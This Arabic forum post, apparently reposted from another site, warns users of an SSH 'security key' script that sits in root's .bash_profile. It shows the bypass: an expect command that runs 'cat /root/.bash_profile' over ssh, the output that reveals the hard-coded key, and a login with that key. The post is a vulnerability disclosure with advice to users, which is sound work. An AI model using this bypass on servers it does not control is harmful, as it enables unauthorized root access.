تحذير لمن يستخدم Security SSH Scrip ويعتمد عليه
 

بسم الله والصلاة والسلام على رسول الله



السلام عليكم جميعا

سمعنا ببرنامج Security SSH Scrip

والذي يقوم بمطالبتك بمفتاح تقوم بكتابته بعد ادخالك لباس الروت
يتم مطابقة هذا المفتاح
مع الموجود في ملف تعريف الشل لرروت
.bash_profile

مثال
رمز Code:
r020t@MyServ:~$ ssh [email protected]
- - -
| | |
| | +--------- ALERT! You are entering a secured area !
| +----------- SSH Security BY ........: MODELAYER.COM . ABU 3MR
+------------- Help and Support ...........: [email protected]

[email protected]'s password:
Last login: Sat Apr 11 17:39:18 2009 from 99.12.75.89
الى هنا لم يعمل سكربت حماية الشل
ولكن بعد ظهور رسالة آخر دخول هذي
رمز Code:
Last login: Sat Apr 11 17:39:18 2009 from 99.12.75.89
يجي دور سكربت الحماية
ويطلبك بالتالي
رمز Code:
welcome to Modelayer.com Security Aria

Please Provide The Secret Code For Enter Ssh
Enter Security Key to Continue:
اذا ادخلت الـkey
صحيح حتى يتطابق مع الكي الموجود بملف التعريف
.bash_profile

اكتملت عملية الدخول

وان فشلت المطابقة

يقولك التيرمنال
oute

بصراحة كنت اسمع عنه هالسكربت ولا عمري جربته
والله راد انه يوقف عقبه في طريقي

ولكن لو نظرنا بنظرة الذي يريد تخطي هالعقبه

تلاحظ
انه تم دخولك
وظهرت رسالة المعهوده لدينا وهي الـlast login
وإن لم تكن قد دخلت لما ظهرت هالرسالة

قلت انفذ امر خر قبل مطالبتي بالكود

وتم تنفيذ أمر اللينكس التالي
لقراءة ملف التعريف
رمز Code:
r020t@MyServ:~$ expect -c 'spawn ssh [email protected] cat /root/.bash_profile ; expect password ; send "Myp4ss\n" ; interact'
فأنظر إلى النتائج
رمز Code:
spawn ssh [email protected] cat /root/.bash_profile

- - -
| | |
| | +--------- ALERT! You are entering a secured area !
| +----------- SSH Security BY ........: MODELAYER.COM . ABU 3MR
+------------- Help and Support ...........: [email protected]

[email protected]'s password:

# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

export PATH
unset USERNAME
echo ""
function nobreak()
{
echo ""
echo ""
echo "You cannot use that command"
echo ""
echo -en "Enter Security Key to Continue: "
}
trap nobreak INT
echo "welcome to Modelayer.com Security Aria"
echo -e "Please Provide The Secret Code For Enter Ssh"
echo -en "Enter Security Key to Continue: "
stty -echo
read sec
if [ "$sec" = "XXMyK3yXX" ]
then
stty echo
echo ""
echo ""
echo "Have A Nice Day."
echo ""
su
else
stty echo
echo "Wrong See You."
sleep 5
fi
exit
echo $PS1
PS1='ْْْْXXXXX.Com -> '
stdin: is not a tty
expect: invalid option -- 'y'
usage: expect [-div] [-c cmds] [[-f] cmdfile] [args]
r020t@MyServ:~$

وبكذا قرينا المفتاح
رمز Code:
if [ "$sec" = "XXMyK3yXX" ]
وتم استخدامه في اعادة الدخول ونجحت المطابقة

ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــ

مهم جدا
ما ذكر أعلاه لا ينقص من حق المبرج شيئاً
وإنما ذكرت ذلك في موضوع اعلانه عن هالسكربت في موقعه
وأيدته على الفكره السليمة
لو تم عملها بشكل محصن
او اخفاء الباس في ملف تتم ترجمته بعمل الكومبايل له اثناء تنصيب البرنامج
بشرط ان لا يتكون ملف مؤقت في مجلد t m p او غيره

ونرجع نقراه من جديد
ويضعف برنامجنا

وقبل أن أحذر في ترياق الذي يهمني اكثر من موقع المبرمج

حذرت في موقعه
لكي لا نجعل لسؤء الضن مدخل
لكلامنا هذا


------------------------------
النصيحه لمن يستخدمه
او ينصح به

عليك بالتفكير في حماية شل سيرفرك
بطريقة أخرى حتى ينزل الترقيع من المبرمج

والله الموفق لما فيه الخير


منقول من ترياق العرب ..

والشكر يعود لله ثم الآخ الغالي ..

أبــو ليان
020